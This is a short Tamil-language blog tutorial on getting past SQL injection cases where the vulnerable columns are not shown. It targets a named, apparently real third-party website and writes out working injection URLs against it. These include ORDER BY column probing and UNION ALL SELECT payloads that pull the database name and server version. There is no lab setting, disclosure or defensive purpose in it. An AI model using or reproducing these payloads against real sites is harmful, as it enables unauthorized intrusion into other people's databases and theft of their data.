SQL Injection செய்யும் போது Vunl Column காட்டாமல் இருப்பதை Bypass செய்வது எப்படி?

இன்று நாம் பார்க்கபோகும் பதிவு SQL Injection செய்யும் போது Vunl Columns காட்டாமல் இருப்பதை Bypass செய்து , Vunl Columns –ஐ கண்டறிவது எப்படி என்று பார்போம்.

நான் எடுத்து கொண்ட Site http://taiwan-tiger.tw/news_index.php?id=4
 இந்த Site http://taiwan-tiger.tw/news_index.php?id=4’ SQl Vuln இருக்கிறது.


ஆனால் ORDER+BY Command-ஐ கொடுக்கும் போது  Vunl Column-ஐ காட்ட வில்லை [Unknown column '1000' in 'order clause'] Site normal-ஆக Load ஆகிறது.

ஆகவே இதை Bypass செய்ய Vuln Link உடன் –ஐ சேர்த்து விட்டு தேவையான Command-ஐ Execute செய்யவும்.
 http://taiwan-tiger.tw/news_index.php?id=-4'+ORDER+BY+4--+


இப்பொது உங்களுக்கு Vunl Column காட்டப்படும். Vunl Column “4”
அடுத்தது UNION+ALL+SELECT Command-ஐ Execute செய்யவும், Injection Point 2,3,4
http://taiwan-tiger.tw/news_index.php?id=-4'+UNION+ALL+SELECT+1,2,3,4--+ 

http://taiwan-tiger.tw/news_index.php?id=-4'+UNION+ALL+SELECT+1,database(),@@version,4--+




குறிப்பு இந்த Site-ல் -ஐ பயன்படுத்த வேண்டும்.-ஐ  நீக்க கூடாது இல்லையேனில் Command வேலை செய்யாது. 

                           Watch Video

No comments